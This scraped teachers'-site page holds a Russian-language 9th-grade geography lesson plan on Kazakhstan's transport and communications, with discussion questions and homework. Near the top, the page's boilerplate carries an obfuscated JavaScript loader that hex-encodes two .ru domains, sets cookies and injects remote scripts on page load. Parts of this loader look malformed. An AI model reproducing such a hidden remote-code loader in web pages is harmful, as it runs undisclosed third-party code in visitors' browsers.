kopilkaurokov.ru - сайт для учителей

Создайте Ваш сайт учителя Курсы ПК и ППК Видеоуроки Олимпиады Вебинары для учителей

Новоникольская средняя школа

Нажмите, чтобы узнать подробности

Транспортный комплекс.

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="20864",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},a=function(o,e,t){var n=document.location.protocol+"//"+o;if(window.smlo)window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo)window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("kopilkaurokov.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();

Вы уже знаете о суперспособностях современного учителя?
Тратить минимум сил на подготовку и проведение уроков.
Быстро и объективно проверять знания учащихся.
Сделать изучение нового материала максимально понятным.
Избавить себя от подбора заданий и их проверки после уроков.
Наладить дисциплину на своих уроках.
Получить возможность работать творчески.

Просмотр содержимого документа
«Новоникольская средняя школа »

Тема: «Транспортный комплекс»


Тип урока: комбинированный

Задачи:

1) Образовательные:







2) Воспитательные:





3) Развивающие:







Методы и методические приёмы:






1) Сформировать у учащихся представление о значении транспортного комплекса для экономики Казахстана.

2) Охарактеризовать транспортную инфраструктуру Казахстана.

3) Создать условия для усвоения учащимися знаний о развитии современных видов связи в Казахстане.


1) Продолжить формирование естественно-научного

мировоззрения учащихся

2) Воспитывать интерес к предмету

3) Осуществление патриотического воспитания


1) Стимулировать познавательную активность, умение

быстро и четко формулировать свои мысли.

2) Формирование комплекса общеучебных

познавательных умений: логически мыслить,

анализировать, сравнивать, обобщать, делать выводы, выделять главное.


Словесные (эвристическая беседа, рассказ)

Наглядные (работа с картами)

Сравнение и обобщение

Самостоятельная работа с учебником


План урока:

1) Организационный момент.

2) Актуализация опорных знаний.

3) Знакомство с темой и целью урока. Мотивация

учебной деятельности.

4) Восприятие и осознание нового материала

5) Закрепление пройденного материала

6) Комментирование Д/З

7) Подведение итогов урока. Комментирование

оценок.










I. Актуализация опорных знаний: устный опрос по вопросам:

1) Перечислите ведущие отрасли животноводства Казахстана. Какие факторы влияют на их размещение?

2) Какие направления сформировались в овцеводстве? Чем обу­словлено их развитие? Назовите главные особенности пище­вой промышленности. Почему ее называют самой массовой от­раслью экономики?

3) Чем отличается размещение предприятий хлебопекарной и рыбной промышленности?

4) Охарактеризуйте сырьевую базу легкой промышленности Ка­захстана. С какими отраслями экономики у нее сложились тес­ные производственные связи?

5) Какие факторы определяют размещение отраслей легкой про­мышленности? Приведите примеры.

II. Изучение нового материала:

1. Транспорт - «кровеносная система» экономики.

Главная за­дача транспорта - перевозка грузов и пассажиров внутри страны и за ее пределами. Его роль в такой большой стране, как Казахстан, особенно велика. Транспорт - ос­нова нормальной работы всей эко­номики. Он обеспечивает производ­ственный процесс, связывает пред­приятия, отрасли и регионы, пере­возит внешнеторговые грузы, об­служивает население. Транспорт называют «кровеносной системой хозяйственного организма», без ко­торой тот просто не может суще­ствовать. Поэтому создание высо­коразвитого, слаженно работающего транспорта - одно из условий прогресса страны.

Транспорт - это сложный комплекс. Он включает в себя 4 со­ставные части. Это транспортные средства (автомобили, поезда, суда, самолеты), пути (железные и автомобильные дороги, воздушные и мор­ские пути, трубопроводы), организации (авиационные, морские, же­лезнодорожные и автомобильные компании) и погрузочно-разгрузоч­ные пункты (морские и «воздушные» порты, железнодорожные и ав­томобильные станции). Вот почему транспорт - не просто отрасль экономики, а сложный комплекс. Мы называем его комплексом и по­тому, что человек использует самые разные транспортные средства и пути (сухопутные, водные, воздушные). В соответствии с этим в нем выделяются отдельные отрасли, или виды транспорта.

?: Рассмотрите рис. 113 с. 194. Как подразделяется транспорт по назначению? В чем, по вашему мнению, различие между транспортом общего пользо­вания и производственным? Каким бывает транспорт по выполняемой работе? Назовите основные виды транспорта.

Зап. на доске:















Транспорт не производит материальных благ. Но стоимость перевозок входит в себестоимость продукции предприятий и орга­низаций. Поэтому его иногда относят к материальному производ­ству. Работу самого транспорта измеряют двумя показателями. Первый показатель - количество перевезенных грузов и пассажи­ров. Он выражается соответственно в тоннах и количестве человек. Данный показатель не полностью отражает проделанную работу. Чтобы понять это, решите задачу.

Два автомобиля нагрузили равным количеством груза - по 5 т. Первый перевез его на расстояние 10 км, а второй - на 100 км. Который из них выполнил большую работу?

Едва ли ваши ответы будут разными. Второй автомобиль со­вершил больший пробег с грузом, потратил больше топлива, его работа больше и в денежном выражении, и по обороту (пробегу) с грузом. Поэтому второй показатель работы транспорта - грузо­оборот, а в пассажирских перевозках - пассажирооборот.

Зап. в тетр.: грузооборот - это количество перевезенного груза на опреде­ленное расстояние за единицу времени (за день, месяц, год). В на­шем примере первый автомобиль совершил грузооборот 50 тонно-километров (ткм), а второй - 500 ткм.

?: Сформулируйте самостоятельно определение понятия «пасса­жирооборот». В каких единицах измерения, по вашему мнению, он выражается?

Казахстан имеет крупный транспортный комплекс (рис. 114 с. 195). Но у него есть нерешенные проблемы.

?: Как вы думаете, что это за проблемы?

Недостаточно имеющихся путей сообщения. Они пока невысокого качества (особенно автомо­бильные дороги). С этим связана небольшая скорость движения, а значит, и пропускная способность транспортных «артерий».

Используется много устаревших транспортных средств. Поэто­му возникла диспропорция между динамично развивающейся эко­номикой и «не успевающим» за ней транспортным комплексом. Отставание транспорта сдерживает рост многих производств.

Для улучшения его работы надо обновить созданные пути со­общения и построить новые, увеличить грузоподъемность и ско­рость доставки грузов. Этому способствует контейнеризация пере­возок. Она исключает лишние погрузочно-разгрузочные операции и ускоряет доставку товаров.

На транспорте сложилось своеобразное разделение труда. На­пример, авиация почти полностью работает на население, а трубо­проводы - целиком на производство. Велики различия в показате­лях работы разных отраслей комплекса (рис.115 с. 196).

Проанализируйте географию главных видов транспорта и его особенности.

2) Сухопутный транспорт в нашей «сухопутной» стране - клю­чевой. Большое значение в нем имеет железнодорожный транспорт. Железные дороги - это «каркас» всей транспортной системы Ка­захстана. Они связывают регионы страны в единое целое, работа­ют регулярно, постоянно, независимо от климата и сезона года. Скорость движения на них значительна, а стоимость перевозок невелика. Железные дороги — транспорт дальних расстояний и са­мый универсальный. Он способен перевозить почти все грузы, а «стальные артерии» можно строить в любых направлениях.

Железные дороги появились в Казахстане в конце XIX в. В начале XX столетия (1904-1905 гг.) по его территории прошла первая крупная дорога - Оренбург-Ташкент. Но в главных чер­тах дорожная сеть была сформирована в советское время. Основа ее - крупные магистрали, соединяющие несколько частей страны. «Рисунок» казахстанских дорог определяют 3 меридиональные магистрали: Оренбург-Ташкент, Туркестано-Сабирская (Семей-Алматы-Луговая), Трансказахстанская (Петропавловск-Караганда-Шу) и 2 широтные: Среднесибирская (Челябинск-Костанай-Кокшетау-Карасу) и Южно-Сибирская (Карталы-Астана-Кулунда-Барнаул). Соединяясь, они образуют «большое железнодорожное кольцо» Казахстана. В него «вливаются» другие «стальные арте­рии», в том числе Трансазиатская магистраль, протянувшаяся от Китая до Турции.

Большую часть (3/4) перевозок железнодорожного транспорта приходится на уголь, руды, нефть и строительные материалы. Это отражается на географии грузопотоков. Напряженнее всего рабо­тают Южно-Сибирская и Трансказахстанская магистрали - более половины пассажирских перевозок.

Развитие железнодорожного транспорта предполагает:

1) стро­ительство новых дорог;

2) их электрификацию, позволяющую вдвое увеличить пропускную способность;

3) создание скоростных маги­стралей;

4) контейнеризацию перевозок.

Если железнодорожный транспорт - «каркас» транспортной си­стемы, то автомобильный - ее главное связующее звено. Он соединяет магистральные виды транспорта, перевозит грузы отдельных пред­приятий к ним и обратно. Это транспорт коротких расстояний, ско­ростной, самый маневренный. Автомобили доставляют товары «от двери до двери», без промежуточной перевалки. Их роль особенно велика в городах, пригородах и горных районах. Дальние магистраль­ные перевозки обеспечивают мощные быстроходные грузовики. Но автотранспорт - дорогой и экологически «грязный».

Эффективность работы автомобильного транспорта во многом зависит от густоты и качества дорог.

Зап. в тетр.: общая протяженность авто­магистралей более 90 тыс. км.

А для нормального хозяйствования Казахстану надо иметь в 2,5 раза больше. Дорожная сеть страны очень неравномерна. В главном она повторяет географию железных дорог. Самый насыщенный автотрассами регион - Север. Чис­ло их на Западе и в Центре вдвое меньше. До сих пор нет сквозной широтной дороги, пересекающей Казахстан с запада на восток.

В нашей стране автомобиль давно стал самым массовым тран­спортным средством (в 2008 г. - свыше 3,2 млн. единиц), а авто­транспорт - бесспорным лидером в грузовых (3/4) и пассажирских (99%) перевозках.

По массе транспортируемых грузов выделяются горно-добывающие и металлургические области (Карагандинская, Восточно-Казахстанская и Костанайская), где велика роль производственно­го транспорта. География пассажирских перевозок больше соот­ветствует размещению населения.

Автомобильный транспорт Казахстана развивается в несколь­ких направлениях. Реконструируются действующие и проклады­ваются новые магистрали. Строятся дороги в сельской местности.

Узкоспециализированные виды сухопутного транспорта - тру­бопроводный и электронный. Трубопроводы перекачивают нефть, газ и работают в едином «конвейере» с нефтегазовой и нефтепере­рабатывающей промышленностью. Их тоже можно строить в лю­бых направлениях, они короче железных дорог, а строительство обходится дешевле. Грузы «идут» в одну сторону, непрерывно, в большом количестве. Поэтому трубопроводный транспорт - один из самых дешевых. С географией трубопроводов вы уже знакомы.

?: Вспомните, где расположены и как называются самые большие нефтепроводы. Достаточно ли их для нашей страны? Какие зада­чи предстоит решать для совершенствования трубопроводной системы?

Самый «трубопроводный» район в Казахстане - Запад, где «рож­даются» мощные нефтяные и газовые потоки. Главный узел их - Атырау, от которого веерообразно расходятся нефтепроводы. Че­рез этот край проложены мощные транзитные газопроводы «Сред­няя Азия-Центр» и «Бухара-Урал». Срединные области с севера на юг пересекает нефтепровод Омск-Павлодар-Шымкент-Чарджоу. С запада в него вливается кумкольская «ветка», а от него «труба» идет на восток, в Китай.

На очереди - строительство газопровода «Запад-Юг-Китай».

Электронный транспорт передает электроэнергию по проводам ЛЭП. Они связывают крупнейшие промышленные центры страны и обеспечивают электричеством сельские поселения.

В крупных городах пассажиров перевозит экологически чистый элект­рический транспорт - троллейбусы (Алматы, Петропавловск, Астана, Тараз и др.) и трамваи (Павлодар, Алматы, Усть-Каменогорск, Караганда). Сухопутный транспорт тесно взаимодействует с водным.

3) Водный транспорт в основном работает на естественных путях, не требующих больших затрат на их оборудование. Он по­требляет немного топлива (в пересчете на 1 т груза) и имеет низкую себестоимость перевозок объемных (массовых) товаров. Но у него небольшая скорость движения, работа часто сезонная, а судо­ходные трассы не всегда идут в нужном направлении.

Водный транспорт делится на морской и речной. Периферийное ЭГП Каспийского моря, единственного района морского судоход­ства, определило главное назначение морского транспорта - осу­ществлять внешнеторговые связи. Поэтому основные перевозки - заграничные. Объем каботажных перевозок (между портами нашей страны) меньше.

Вспомните, с чем еще связано быстрое развитие морского тран­спорта и каботажа на Каспийском море,

Морской транспорт - самый молодой и динамично развиваю­щийся. У него сложное хозяйство: флот, порты, ремонтные заводы,

В составе флота есть современные танкеры («Астана», «Алматы», «Абай»), самоходные баржи, ледокольные буксиры. Главные морские ворота страны - незамерзающий торговый порт Актау. По грузообороту (10 млн. т в год) он - один из крупнейших на Каспии. Главные грузы - нефть (85%), прокат и зерно. Паромные переправы связывают Актау с портами России и Азербайджана.

Нефтяной порт строится в бухте Курык. Он будет принимать более крупнотоннажные (30-60 тыс. т) танкеры, которые скоро появятся на море. Третий порт, Баутино, развивается как опорная база освоения морских нефтяных богатств.

Речной транспорт - самый зависимый от природных условий. По рекам выгодно перевозить массовые гру­зы, не требующие быстрой доставки, - уголь, нефтепродукты, лес, зерно, строительные материалы. Объем их быстро растет. Геогра­фию работы этого транспорта определяют 2 речных бассейна.

4. Воздушный транспорт - самый быстрый, но и самый доро­гой. Главная его специализация - перевозка пассажиров на даль­ние расстояния. Самолеты доставляют также срочные и дорогие грузы (почту, скоропортящиеся продукты, цветы).

Воздушные перевозки в Казахстане выполняют несколько авиа­компаний («СКАТ», «Атырау aye жолы», «Кокшетау», «Семейавиа» и др.). Самая большая из них - «Эйр Астана», национальный авиа­перевозчик.

Она обслуживает десятки международных и внутренних маршрутов. Ее воздушные лайнеры летают в 10 государств мира, в том числе в Рос­сию, Китай, Германию, Индию. «Эйр Астана» перевозит 3/5 всех авиапас­сажиров республики.

Главная «воздушная гавань» страны - Астана (более 3/4 всех пассажиров). Современный международный аэропорт построен в столице.

Авиацию применяют и в сельском хозяйстве. С ее помощью тушат лесные пожары, наблюдают за трубопроводами, доставля­ют «экстренных» больных, осваивают нефтяные и газовые ресурсы.

5) Территориальная организация транспорта.

В Казахстане формируется Единая транспортная система. Важнейшая ее часть - всевозможные пути сообщения. Их соединяют транспортные узлы, т.е. пункты, где сходятся разные «дороги» (железные, авто­мобильные, речные) и производится перевалка грузов с одного вида транспорта на другой. В Казахстане несколько десятков тран­спортных узлов различных типов. Особенно выделяются Темиртау, Караганда, Алматы, Актау.

6) Связь. Это звено коммуникационной системы включает поч­товую связь и телекоммуникации. Его основная задача - передавать разнообразную информацию, объемы и значение которой быстро растут.

Старейшая отрасль звена - почтовая связь. Ее все больше тес­нят современные телекоммуникационные виды связи. Они стреми­тельно развиваются в нескольких направлениях. Создание опти­ко-волоконных линий включает нашу страну в гигантскую миро­вую коммуникационную сеть, поднимает уровень «телефонизации» населения (пока телефоны имеют 3/4 городских семей и 1/3 сель­ских). Отставание почтовой связи частично компенсирует беспро­водная связь - пейджинговая, сотовая. Сотовых телефонов в стра­не уже больше, чем обычных. Создание оптико-волоконных линий включает нашу страну в гигантскую мировую коммуникационную сеть, поднимает уровень «телефонизации» населения. Большое зна­чение имеют спутниковое телевидение и использование «всемирной паутины» - Интернета.

Жизнедеятельность общества невозможна без налажен­ной инфраструктуры. В ней важную роль играет коммуникацион­ная система - транспорт и связь. Для транспортного комплекса важнейшая задача - совершенствование транспортной сети, а для связи - развитие современных видов.

III. Закрепление:

1. В чем значение транспорта для хозяйства и населения Казах­стана?

2. Перечислите основные виды транспорта.

3. Какими показателями измеряют работу транспорта? Чем они отличаются?

4. Какой вид транспорта в Казахстане ведущий? Почему?

5. Назовите преимущества и недостатки автомобильного транс­порта.

6. Расскажите о развитии современных видов связи в Казахстане.

7. Что такое инфраструктура, коммуникационная система, маги­страль, транспортный узел?


Д/З: §17-18 с. 193-217.





Получите в подарок сайт учителя

Предмет: География

Категория: Планирование

Целевая аудитория: 9 класс

Скачать
Новоникольская средняя школа

Автор: Усенова Татьяна Викторовна

Дата: 21.07.2015

Номер свидетельства: 223247


Получите в подарок сайт учителя

Видеоуроки для учителей

Курсы для учителей

ПОЛУЧИТЕ СВИДЕТЕЛЬСТВО МГНОВЕННО

Добавить свою работу

* Свидетельство о публикации выдается БЕСПЛАТНО, СРАЗУ же после добавления Вами Вашей работы на сайт

Удобный поиск материалов для учителей

Ваш личный кабинет
Проверка свидетельства